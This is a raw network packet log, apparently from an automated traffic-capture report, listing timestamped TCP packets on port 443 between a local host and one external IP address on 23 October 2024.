                                                                                                                                                                                                            Oct 23, 2024 07:03:23.901473045 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.901623964 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.998462915 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.998492002 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.998583078 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.998599052 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.998739958 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.000217915 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.000241041 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.000296116 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.000305891 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.000341892 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.018774986 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.018820047 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.018851042 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.018858910 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.018873930 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.018893957 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.020571947 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.020612955 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.020647049 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.020662069 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.020677090 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.020692110 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.117695093 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.117742062 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.117825031 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.117835045 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.117855072 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.117883921 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.119637966 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.119671106 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.119705915 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.119714022 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.119729996 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.119749069 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.137819052 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.137867928 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.138042927 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.138055086 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.138092041 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.139727116 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.139769077 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.139802933 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.139813900 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.139838934 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.139861107 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.236323118 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.236407995 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.236427069 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.236438036 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.236469030 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.236480951 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.238167048 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.238218069 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.238239050 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.238249063 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.238261938 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.238277912 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.240374088 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.240430117 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.240447044 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.240458965 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.240479946 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.240494967 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.258029938 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.258089066 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.258112907 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.258122921 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.258147955 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.258167028 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.299491882 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.299515009 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.299715996 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.299725056 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.299763918 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.356167078 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.356214046 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.356302977 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.854458094 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.937138081 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.937158108 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.937231064 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.937241077 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.937277079 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.951155901 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.951176882 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.951231003 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.951240063 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.951273918 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.953098059 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.953119040 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.953171015 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.953178883 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.953214884 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.955605030 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.955626011 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.955651999 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.955657959 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.955677032 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.955697060 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.972043037 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.972064018 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.972129107 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.972136974 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.972172022 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.973692894 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.973711967 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.973757029 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.973763943 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.973793983 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.068620920 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.068643093 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.068743944 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.068769932 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.068804979 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.070943117 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.070964098 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.071042061 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.071050882 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.071099043 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.073148966 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.073170900 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.073272943 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.073282003 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.073316097 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.074784040 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.074804068 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.074856997 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.074865103 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.074904919 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.074920893 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.090481997 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.090501070 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.090540886 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.090555906 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.090570927 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.090589046 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.092912912 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.092933893 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.092976093 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.092987061 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.093000889 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.093019009 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.187742949 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.187769890 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.187819004 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.187829018 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.187848091 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.187870026 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.189141989 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.189171076 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.189196110 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.189203024 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.189224958 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.189235926 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.191559076 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.191579103 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.191622972 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.191628933 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.191652060 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.191669941 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.193351030 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.193372011 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.193394899 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.193399906 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.193423986 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.193442106 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.209036112 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.209055901 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.209089041 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.209095001 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.209120989 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.209136963 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.210870028 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.210889101 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.210921049 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.210927010 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.210947037 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.210963964 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.668184042 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.669908047 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.669929028 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.669977903 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.669985056 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.670013905 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.683943987 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.683963060 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.684041023 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.684046984 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.684082031 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.685091019 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.685106993 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.685158968 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.685163975 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.685192108 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.687474966 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.687489986 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.687546968 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.687556028 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.687608004 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.782561064 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.782598972 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.782790899 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.782809973 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.782860041 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.784015894 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.784034014 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.784096956 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.784104109 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.784142971 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.785284996 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.785301924 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.785337925 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.785361052 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.785370111 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.785382032 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.785406113 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.785424948 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.785471916 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.785629034 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.785643101 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.814759970 CEST49997443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.814811945 CEST4434999795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.814882040 CEST49997443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.815084934 CEST49997443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:25.815104008 CEST4434999795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:26.679073095 CEST4434999795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:26.679279089 CEST49997443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:26.679934978 CEST49997443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:26.679949045 CEST4434999795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:26.687669039 CEST49997443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:26.687684059 CEST4434999795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:26.687704086 CEST49997443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:26.687711000 CEST4434999795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:39.477008104 CEST4434999495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:39.477204084 CEST4434999495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:39.477448940 CEST49994443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:39.478377104 CEST49994443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:39.478403091 CEST4434999495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:40.107697010 CEST50000443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:40.107738972 CEST4435000095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:40.107810020 CEST50000443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:40.108081102 CEST50000443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:40.108093023 CEST4435000095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:40.979624987 CEST4435000095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:40.979718924 CEST50000443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:40.980232954 CEST50000443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:40.980240107 CEST4435000095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:40.981941938 CEST50000443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:40.981947899 CEST4435000095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:41.888655901 CEST4435000095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:41.888772011 CEST4435000095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:41.888843060 CEST50000443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:41.897460938 CEST50000443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:41.897478104 CEST4435000095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:42.325927973 CEST50001443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:42.325984955 CEST4435000195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:42.326059103 CEST50001443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:42.326291084 CEST50001443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:42.326297998 CEST4435000195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:43.235881090 CEST4435000195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:43.236394882 CEST50001443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:43.236394882 CEST50001443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:43.236413956 CEST4435000195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:43.238254070 CEST50001443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:43.238260984 CEST4435000195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:44.172199011 CEST4435000195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:44.172297955 CEST4435000195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:44.172349930 CEST50001443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:44.172349930 CEST50001443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:44.173238993 CEST50001443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:44.173257113 CEST4435000195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:44.173932076 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:44.173976898 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:44.174036026 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:44.174455881 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:44.174473047 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:45.075977087 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:45.076078892 CEST50002443192.168.2.695.217.220.103
